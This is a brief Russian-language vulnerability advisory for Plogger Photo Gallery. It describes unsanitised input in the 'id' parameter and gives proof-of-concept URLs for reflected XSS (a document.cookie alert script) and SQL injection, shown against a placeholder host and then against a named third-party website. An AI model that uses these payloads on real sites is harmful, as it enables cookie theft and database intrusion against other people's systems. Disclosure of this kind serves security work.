Software: Plogger Photo Gallery > = 2.1
Vendor: Plogger www.plogger.org

Уязвимость существует из-за недостаточной обработки входных данных в параметре "id"
. Удаленный пользователь может с помощью специально сформированного запроса
выполнить Sql-инъекция и произвольный код сценария в браузере жертвы в контексте
безопасности уязвимого сайта.

Межсайтовый скриптинг:

http://www.xxx.com/gallery/indexphp?level=album&id= %3Cscript%3Ealert(document.cookie);%3C/script%3E

Sql-инъекция:

http://www.xxx.com/gallery/index.php?level=album&id=’1

Примеры:

http://www.mahyuni.com/gallery/index.php?level=album&id=’1
http://www.mahyuni.com/gallery/index.php?level=album&id= %3Cscript%3Ealert(document.cookie);%3C/script%3E



Оставить мнение